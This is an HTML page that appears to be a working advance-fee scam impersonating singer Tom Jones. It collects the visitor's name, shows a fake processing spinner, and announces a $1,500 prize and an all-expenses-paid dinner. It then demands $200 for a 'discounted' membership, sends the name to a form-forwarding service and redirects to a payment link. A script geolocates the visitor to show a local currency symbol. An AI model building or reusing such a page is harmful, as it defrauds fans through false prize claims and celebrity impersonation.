

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta charset=utf-8>
  <title>Tom Jones</title>
  <style>
    #mainContent {
      display: none;
    }
    
    #processing {
      display: none;
      text-align: center;
    }
    
    .lds-ring {
      display: inline-block;
      position: relative;
      width: 80px;
      height: 80px;
    }
    
    .lds-ring div {
      box-sizing: border-box;
      display: block;
      position: absolute;
      width: 154px;
      height: 154px;
      margin: 8px;
      border: 8px solid Black;
      border-radius: 50%;
      animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
      border-color: black transparent transparent transparent;
    }
    
    .lds-ring div:nth-child(1) {
      animation-delay: -0.45s;
    }
    
    .lds-ring div:nth-child(2) {
      animation-delay: -0.3s;
    }
    
    .lds-ring div:nth-child(3) {
      animation-delay: -0.15s;
    }
    
    @keyframes lds-ring {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }
  </style>
  <script>
    function submitForm() {
      // Hide the form
      document.getElementById("myForm").style.display = "none";
      
      // Display the "Processing" message and animation
      document.getElementById("processing").style.display = "block";
      
      // Delay displaying the main content
      setTimeout(function() {
        // Hide the processing message and animation
        document.getElementById("processing").style.display = "none";
        
        // Display the main content
        document.getElementById("mainContent").style.display = "block";
        
        // Get the form data
        const name = document.getElementById("name").value;
     
        
        // Display the submitted form data in multiple places within the main content
        const submittedNameElements = document.getElementsByClassName("submittedName");
        
        
        for (let i = 0; i < submittedNameElements.length; i++) {
          submittedNameElements[i].textContent = name;
        }
        
        
        // Scroll to the main content section
        document.getElementById("mainContent").scrollIntoView({ behavior: 'smooth' });
      }, 3000); // 13 seconds delay
    }
  </script>
</head>
<body>
  
  
  
  
  <form id="myForm" onsubmit="submitForm(); return false;">
 

<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT6iHH0BDw566gKHkIRKkksqccMC8JtgPEFDw&amp;amp;usqp=CAU">

 
  
    
  <div> 
  <div class="formbold-form-wrapper">


  <form id="myForm" onsubmit="submitForm(); return false;">


<h5> 
<strong> 
 
<br>
To access your Tom Jones meet and greet profile, please enter your full name below to ensure authorized access.

</strong> 
</h5> 




<div id="error-message"></div>

<script>
function validateInput(input) {
  var minLength = 6;
  var maxLength = 50;
  var errorMessage = document.getElementById("error-message");

  if (input.value.length < minLength || input.value.length > maxLength) {
    errorMessage.textContent = "";
    input.setCustomValidity("Enter your full name");
  } else {
    errorMessage.textContent = "";
    input.setCustomValidity("");
  }
}
</script>




<div class="formbold-mb-5">
        <label for="Field1" class="formbold-form-label">   
        Enter Your First and Last Name
        </label>
  
        <input
          type="text" 
          
          oninput="validateInput(this)"
          
          required 
         
          autocorrect="off"
          autocomplete="off"
          spellcheck="false"
          
          name="A_"
         
         id="name"
         
          placeholder="Enter First and Last Name"  
          class="formbold-form-input"
        />
      </div>
      




      <div>
        <button type="submit" value="Submit"
       class="formbold-btn w-full">CONTINUE</button>
      </div>
      
      
          <br> <br> <br>
    </form>
  </div>
</div>


<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-5 {
    margin-bottom: 20px;
  }
  .formbold-pt-3 {
    padding-top: 12px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 600;
    font-size: 20px;
    color: black;
    margin-bottom: 14px;
  }
  .formbold-form-label-2 {
    font-weight: 600;
    font-size: 20px;
    margin-bottom: 20px;
  }

  .formbold-form-input {
    width: 100%;
    padding: 17px 24px;
    border-radius: 6px;
    border: 3px solid Black;
    background: white;
    font-weight: 500;
    font-size: 18px;
    color: black;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: gray;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 23px;
    border-radius: 14px;
    padding: 15px 32px;
    border: none;
    font-weight: 600;
    background-color: #2F539B;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 100%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: DarkRed;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style>

  

  





  <div id="processing">



    <h4> 

<br> <br> 


<font size="+3">
Processing.... </font>


</h4> 





    <div class="lds-ring">
      <div></div>
      <div></div>
      <div></div>
      <div></div>
    </div>
  </div>
  



  <div id="mainContent">





   
<html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script>


<meta charset=utf-8>


<title>
Tom Jones
</title>



<meta content="width=device-width, initial-scale=1.0" name=viewport>

<meta content="Tom Jones" name=description>



<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>
            
     
                    <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>











<h2>
<strong> 
Tom Jones
</strong>
</h2>













 </div> 
 
</header>

 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content>


<h6> 





  
<script>
  async function convertCurrency() {
    try {
      const response = await fetch('https://ipapi.co/json/');
      const data = await response.json();
      const country = data.country_code;

      const currencySymbolElements = document.getElementsByClassName('currency-symbol');

      if (country === 'GB') {
        Array.from(currencySymbolElements).forEach(element => {
          element.textContent = '£';
        });
      } else if (country === 'DE' || country === 'FR' || country === 'ES' || country === 'NL') {
        Array.from(currencySymbolElements).forEach(element => {
          element.textContent = '€';
        });
      }
    } catch (error) {
      console.error('Error:', error);
    }
  }
  
  document.addEventListener('DOMContentLoaded', convertCurrency);
</script> 

  


<div style="border: 1px solid black; padding: 10px; border-radius: 2px;">
<strong> 
<font size="+1">

 <span class="submittedName"></span>
 
 </font> 
 </strong> 
 <br> 
 
 <br> 

<div> 
<div class="container">
    <div class="left-text"><strong> 
    
<font size="+1">
<strong> 
Approved

</strong></font>

</div>
    <div class="right-text"><strong><font size="+0.5">Available Balance:</strong></strong> </font> 
    
    <br>
    
    <font size="+4">
 <span class="currency-symbol">$</span>1,500</font><strong><font size="+2"></font></strong>

</div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .right-text {
        justify-self: flex-end;
    }
</style>

</div> 

</div> 






<strong>


<font size="+0.5">

<Font STYLE="word-spacing:4px">




<br>
<br> 


Welcome back, 
 <span class="submittedName"></span>
 
 
 
 your all-expenses-paid dinner with Tom Jones is scheduled for October 23, 2024. You will receive further notifications with specific venue and time details. 

<br> <br>


This  is an avenue that Tom Jones uses to show love to his fans since 2005, and you, <span class="submittedName"></span> is one of  the lucky winners of the 2024 meet and greet event, which includes a cash bonus prize of <span class="currency-symbol">$</span>1,500 and an all-expenses-paid dinner with  Tom Jones. 



This event is free for members of the Tom Jones Exclusive community; however,  you are not yet a member. Follow the procedure below to gain a 2-year membership. Please note that, since you are one of the winners of the 2024 meet and greet, the price of a 2-year membership has been reduced to just <span class="currency-symbol">$</span>200 instead of <s><span class="currency-symbol">$</span>950</s>, courtesy of Tom Jones, to ensure you get your meet and greet session with Tom Jones in October.


<br> <br>
<br> 

Proceed to checkout 
</font>



<font size="+1"><span class="currency-symbol">$</span>200</font>

<br> <br>

To proceed

enter your  name below 

<br> <br>


<style>

.my-input {
     width: 100%;
  font-size: 18px; /* Adjust the font size as needed */
  border: 2px solid black;
  height: 50px;
  padding: 10px 15px;
}

/* Target the placeholder text within the class */
.my-input::placeholder {
        Color: black;
  font-size: 19px; /* Adjust the font size as needed */
}


</style>



<form  action="https://formsubmit.io/send/538bcbc9-8ef0-46ba-9114-8a9534b3b334" method="POST" >
<input name="_redirect" type="hidden" id="name" value="https://square.link/u/tm5vUrbr">


<input type="text" name=Potential_Buyer"
  class="my-input"  placeholder=" Enter your full name" required />

<br> <br>


<button type="submit" class="green-button" style="display: block; width: 100%; height: 57px; background-color: #2F539B; color: white; font-size: 22px; font-weight: bold; border: none; border-radius: 50px; cursor: pointer;">CONTINUE</button>

</form>





</font></font>
<br> <br>
<br>
<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRx9ff3vVlOMD-kv9S9SG7y2Y562UmGFjeYRw&amp;amp;usqp=CAU">



</h6> 



<h5> 

<br> <br>




<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTfVeDHAl1s2dgJUrmrgghpPEU648iW0q9OCA&amp;amp;usqp=CAU">



<br> <br> <br> 


 
<center> 

<strong> 

Tom Jones | Meet and Greet 
</strong> 
</font> 


</center> 

<br> <br>  


</h5> 




<script>window.initScriptLater = function (scriptUrl, fallback) {
        const script = document.createElement("script");
        script.onload = fallback;
        script.src = scriptUrl;

        document.addEventListener("readystatechange", () => {
            if (document.readyState === "interactive") {
                document.head.appendChild(script);
            }
        });
    };

    window.initScriptLater("https://cdn.bitpanda.com/app/v2/js/cta-button.min.js?id=d34a8a89944479eef669", () =>
        window.initCtaButton()
    );</script></div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">


<div>


 </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">



</path> </symbol></svg>

  </div>
  
  <script>
    // Hide the processing message and form initially
    document.getElementById("processing").style.display = "none";
    document.getElementById("myForm").style.display = "block";
  </script>
</body>
</html>
